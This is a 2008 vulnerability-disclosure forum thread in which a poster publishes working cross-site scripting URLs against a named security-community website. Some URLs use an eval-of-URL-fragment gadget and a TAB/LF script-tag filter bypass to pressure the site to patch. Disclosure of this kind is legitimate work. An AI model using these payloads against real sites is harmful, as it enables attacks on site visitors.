Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
ethicalhacker.net
Posted by: tx
Date: February 13, 2008 02:38PM

I don't want to seem like I'm beating up on them, but really there is no excuse for this:
6/24/07 http://sla.ckers.org/forum/read.php?3,44,12928#msg-12928 Still not fixed
8/14/07 http://sla.ckers.org/forum/read.php?3,44,14624#msg-14624 Still not fixed, but it doesn't fire (in FF 2.0.0.12 because <script%08> is no longer considered valid, only TAB and LF seem to work in that position now: http://www.ethicalhacker.net/component/option,com_smf/Itemid,54'%22%3E%3Cscript%09%3Ealert(%22xss%22)%3C/script%09%3E/script%3E,666/topic,1584.0/ (this is also now producing a nice juicy sql error, which it didn't previously, so they have to have changed something.)
Somebody was even nice enough to make a post in the ethicalhacker.net forums last december pointing them to the posts in Full Disclosure, and still nothing has been fixed.

So, to provide motivation, here's more:
http://www.ethicalhacker.net/component/option,com_contact/task,view/contact_id,1/Itemid,8%22%3E%3Cimg%20src%20onerror%3Deval%28location.hash.substring%281%29%29%3E%3C%21#alert%28%27xss%27%29

This one requires user interaction, it's fired from an onchange event in the <option> drop down box. http://www.ethicalhacker.net/index.php?searchword=%27/*&option=com_search&searchphrase=*/%3Fdocument.location%3A0%3Beval%28location.hash.substring%281%29%29%3B//&Itemid=#alert%28%27xss%27%29

sad, sad, sad ethicalhacker.net :\

-tx @ lowtech-labs.org

Options: ReplyQuote
Re: ethicalhacker.net
Posted by: Anonymous User
Date: February 13, 2008 10:25PM

Hmm it's Joomla powered, maybe an old version or you found a new flaw.

Options: ReplyQuote
Re: ethicalhacker.net
Posted by: tx
Date: February 15, 2008 09:36PM

old version, this is super old. I think I was the first person to find it, in the first half of last year.

But really, there is no excuse for running ethicalhacker.net ("Your Resource For Forensics, Pen Testing & Incident Response", lol) and not fixing issues that were _publicly_ disclosed over 6 months ago. It puts their users at risk which is unacceptable for a forum operated by, so-called, security professionals.



@Ronald: P.S. You should just drop this little flame war with trev; I, for one, appreciate and value your contributions, and there's no reason to get butt-hurt over posts in a web forum. If someone doesn't appreciate the value of your input, they don't; and if you're wrong you're wrong. No sense in getting upset, it's just the internet...

I propose the fundamental rule of the intertubes: If it's not pr0n, it's not important.

-tx @ lowtech-labs.org

Options: ReplyQuote


Sorry, only registered users may post in this forum.